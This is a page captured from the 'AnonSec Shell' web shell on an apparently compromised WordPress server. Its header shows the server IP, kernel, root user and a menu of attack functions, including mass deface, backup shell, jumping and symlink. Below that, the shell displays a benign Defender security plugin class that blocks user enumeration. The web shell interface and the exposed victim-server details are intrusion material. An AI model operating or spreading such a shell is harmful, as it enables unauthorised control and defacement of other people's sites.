AnonSec Shell

Server IP : 104.21.14.48 / Your IP : 3.17.179.199 [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF
Directory : /var/www/wp-content/plugins/defender-security/src/component/security-tweaks/
Upload File :
[ HOME ] [ BACKUP SHELL ] [ JUMPING ] [ MASS DEFACE ] [ SCAN ROOT ] [ SYMLINK ]
Current File : /var/www/wp-content/plugins/defender-security/src/component/security-tweaks/class-prevent-enum-users.php
<?php
/**
 * Prevents user enumeration on a WordPress site to enhance security by blocking various endpoints and methods that can
 * be used to discover user information.
 *
 * @package WP_Defender\Component\Security_Tweaks
 */

namespace WP_Defender\Component\Security_Tweaks;

use WP_Error;
use WP_Sitemaps_Provider;
use Calotes\Base\Component;
use WP_Defender\Traits\Security_Tweaks_Option;

/**
 * Prevent user enumeration.
 */
class Prevent_Enum_Users extends Component implements Security_Key_Const_Interface {

	use Security_Tweaks_Option;

	/**
	 * The slug identifier for this tweak.
	 *
	 * @var string
	 */
	public $slug = 'prevent-enum-users';

	/**
	 * Status to check if the issue has been resolved.
	 *
	 * @var bool
	 */
	public $resolved = false;

	/**
	 * Enabled user enumerations list.
	 *
	 * @var array
	 */
	private $enabled_user_enums = array();

	/**
	 * Check whether the issue has been resolved or not.
	 *
	 * @return bool
	 */
	public function check(): bool {
		return $this->resolved;
	}

	/**
	 * Here is the code for processing.
	 *
	 * @return bool
	 */
	public function process(): bool {
		return true;
	}

	/**
	 * This is for un-do stuff that has been done in @process.
	 *
	 * @return bool
	 */
	public function revert(): bool {
		return true;
	}

	/**
	 * Shield up.
	 *
	 * @return void
	 */
	public function shield_up() {
		$this->resolved = true;

		if ( is_admin() || defender_is_wp_cli() ) {
			return;
		}

		add_filter( 'oembed_response_data', array( $this, 'oembed_author_filter' ), 99 );
		add_filter( 'wp_sitemaps_users_pre_url_list', array( $this, 'block_user_url_sitemap' ), 99, 0 );
		add_filter( 'wp_sitemaps_add_provider', array( $this, 'block_user_provider_sitemap' ), 99, 2 );
		add_filter( 'rest_authentication_errors', array( $this, 'block_rest_api_user_endpoint' ) );

		$query = defender_get_data_from_request( 'QUERY_STRING', 's' );
		if ( empty( $query ) ) {
			return;
		}

		$this->maybe_block( $query );

		add_filter( 'redirect_canonical', array( $this, 'maybe_block' ) );
	}

	/**
	 * Maybe block the request if it's trying to access the author page with query param.
	 *
	 * @param  string $request  Request of current page.
	 *
	 * @return string
	 */
	public function maybe_block( string $request ): string {
		if ( ! current_user_can( 'edit_others_posts' ) ) {
			$params = array();
			wp_parse_str( strtolower( $request ), $params );

			if (
				isset( $params['author'] )
				&& is_scalar( $params['author'] )
				&& '' !== preg_replace( '/[^0-9,-]/', '', $params['author'] )
			) {
				wp_die(
					esc_html__( 'Sorry, you are not allowed to access this page', 'defender-security' ),
					esc_html__( 'Forbidden', 'defender-security' ),
					403
				);
			}
		}

		return $request;
	}

	/**
	 * Return a summary data of this tweak.
	 *
	 * @return array
	 */
	public function to_array(): array {
		return array(
			'slug'             => $this->slug,
			'title'            => esc_html__( 'Prevent user enumeration', 'defender-security' ),
			'errorReason'      => esc_html__( 'User enumeration is currently allowed.', 'defender-security' ),
			'successReason'    => esc_html__( 'User enumeration is currently blocked, nice work!', 'defender-security' ),
			'misc'             => array(),
			'bulk_description' => esc_html__(
				'To brute force your login,  hackers and bots can simply type the query string ?author=1, ?author=2 and so on, which will redirect the page to /author/username/ - bam, the bot now has your usernames to begin brute force attacks with. We can add a .htaccess file to your site to prevent the redirection.',
				'defender-security'
			),
			'bulk_title'       => esc_html__( 'Prevent user enumeration', 'defender-security' ),
		);
	}

	/**
	 * Getter method of enabled_user_enums.
	 *
	 * @return array Return array of enabled enumeration options.
	 */
	public function get_enabled_user_enums(): array {
		$enabled_user_enums = $this->get_option( 'enabled_user_enums' );

		$this->enabled_user_enums = is_null( $enabled_user_enums )
			? array()
			: (array) $enabled_user_enums;

		return $this->enabled_user_enums;
	}

	/**
	 * Setter method of enabled_user_enums.
	 *
	 * @param  array $value  Array of enabled user enumeration options.
	 *
	 * @return bool Return true if value updated, otherwise false.
	 */
	public function set_enabled_user_enums( $value ): bool {
		$this->enabled_user_enums = (array) $value;

		return $this->update_option(
			'enabled_user_enums',
			$this->enabled_user_enums
		);
	}

	/**
	 * Filters the author detail from oEmbed response data.
	 *
	 * @param  array $data  The response data.
	 *
	 * @return array $data The response data.
	 */
	public function oembed_author_filter( $data ) {
		if (
			is_array( $data ) &&
			in_array(
				'enum-oembed',
				$this->get_enabled_user_enums(),
				true
			)
		) {
			unset( $data['author_name'], $data['author_url'] );
		}

		return $data;
	}

	/**
	 * Blocks user url generation in sitemap.
	 * Consider the URL: http://example.com/wp-sitemap-users-1.xml will not return user URL XML.
	 *
	 * @return bool|void If option sitemap enumeration enabled then return false else null/void will return.
	 */
	public function block_user_url_sitemap() {
		if (
			in_array(
				'enum-sitemap',
				$this->get_enabled_user_enums(),
				true
			)
		) {
			return false;
		}
	}

	/**
	 * Blocks the user provider sitemap before it is added from wp-sitemap.xml.
	 *
	 * @param  WP_Sitemaps_Provider $provider  Instance of a WP_Sitemaps_Provider.
	 * @param  string               $name  Name of the sitemap provider.
	 *
	 * @return bool|WP_Sitemaps_Provider If option sitemap enumeration enabled then return false else
	 *     WP_Sitemaps_Provider instance.
	 */
	public function block_user_provider_sitemap( $provider, string $name ) {
		if (
			'users' === $name &&
			in_array(
				'enum-sitemap',
				$this->get_enabled_user_enums(),
				true
			)
		) {
			return false;
		}

		return $provider;
	}

	/**
	 * Block user REST API endpoint for not logged-in access.
	 *
	 * @param  WP_Error|null|true $errors  WP_Error if authentication error, null if authentication
	 *                                 method wasn't used, true if authentication succeeded.
	 *
	 * @return WP_Error|null|true $errors WP_Error if authentication error, null if authentication
	 *                                    method wasn't used, true if authentication succeeded.
	 */
	public function block_rest_api_user_endpoint( $errors ) {
		$request_uri = (string) filter_input( INPUT_SERVER, 'REQUEST_URI', FILTER_SANITIZE_URL ) ?? '';
		$rest_route  = (string) filter_input( INPUT_GET, 'rest_route', FILTER_SANITIZE_URL ) ?? '';

		$is_url_match = preg_match( '/users/i', $request_uri ) !== 0 ||
						preg_match( '/users/i', $rest_route ) !== 0;

		if (
			in_array(
				'enum-rest',
				$this->get_enabled_user_enums(),
				true
			) &&
			$is_url_match &&
			! is_user_logged_in()
		) {
			return new WP_Error(
				'rest_cannot_access',
				esc_html__( 'Only logged-in users can access the User endpoint REST API.', 'defender-security' ),
				array( 'status' => rest_authorization_required_code() )
			);
		}

		return $errors;
	}
}
Anon7 - 2022
AnonSec Team